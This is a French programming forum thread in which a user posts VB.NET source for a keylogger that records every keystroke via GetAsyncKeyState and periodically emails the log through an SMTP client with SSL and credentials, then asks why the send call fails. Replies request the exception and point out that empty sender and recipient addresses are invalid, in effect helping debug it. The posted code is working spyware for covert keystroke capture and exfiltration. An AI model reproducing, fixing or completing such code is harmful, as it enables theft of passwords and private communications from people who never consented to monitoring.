Partage
  • Partager sur Facebook
  • Partager sur Twitter

j'ai un probléme avec smtpserver.send

    28 juillet 2011 à 14:54:36

    Bon voilà j'ai voulu créer un keylogger qui m'envoie les enregistrements par mail dans VB mais quand il veut envoyer il trouve un problème dans le SMTPServer.send voilà le code :

    Imports System.Net.Mail
    Public Class Form1
    Dim result As Integer
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Int32) As Int16
    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
    For i = 1 To 255
    result = 0
    result = GetAsyncKeyState(i)
    If result = -32767 Then
    RichTextBox1.Text = RichTextBox1.Text + Chr(i)
    End If
    Next i
    End Sub

    Private Sub email_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles email.Tick
    Dim MyMailMessage As New MailMessage()
    MyMailMessage.From = New MailAddress("")
    MyMailMessage.To.Add("")
    MyMailMessage.Subject = ("")
    MyMailMessage.Body = RichTextBox1.Text
    Dim SMTPServer As New SmtpClient("")
    SMTPServer.Port = 587
    SMTPServer.Credentials = New System.Net.NetworkCredential("")
    SMTPServer.EnableSsl = True
    SMTPServer.Send(MyMailMessage)
    RichTextBox1.Text = ("")
    End Sub
    End Class

    Merci.
    • Partager sur Facebook
    • Partager sur Twitter
      28 juillet 2011 à 17:57:32

      Bonjour,

      Il faudrait commencer par nous fournir l'exception que tu as sur cette ligne pour que l'on puisse t'aider.
      Parce que la, je suppose que c'est pour pouvoir poster sur les forums (enfin j’espère), mais le code que tu postes essaye d'envoyer un mail sans serveur, sans expéditeur, ni destinataire...
      • Partager sur Facebook
      • Partager sur Twitter
        28 juillet 2011 à 19:43:08

        mmmh d'après le doc, c'est pas un smtpserver qu'il faut pour envoyer un mail mais un smtpclient!foutu nom de variable a la con!

        http://msdn.microsoft.com/en-us/librar [...] lmessage.aspx
        sinon
        en regardant http://msdn.microsoft.com/en-us/library/14k9fb7t.aspx on voit que le champ 'to' et 'from' de MailAddress ne peuvent pas être égal a ""!
        • Partager sur Facebook
        • Partager sur Twitter
        ** La doc, c'est comme le PQ: ça sert à se démerder tout seul **

        j'ai un probléme avec smtpserver.send

        × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
        × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
        • Editeur
        • Markdown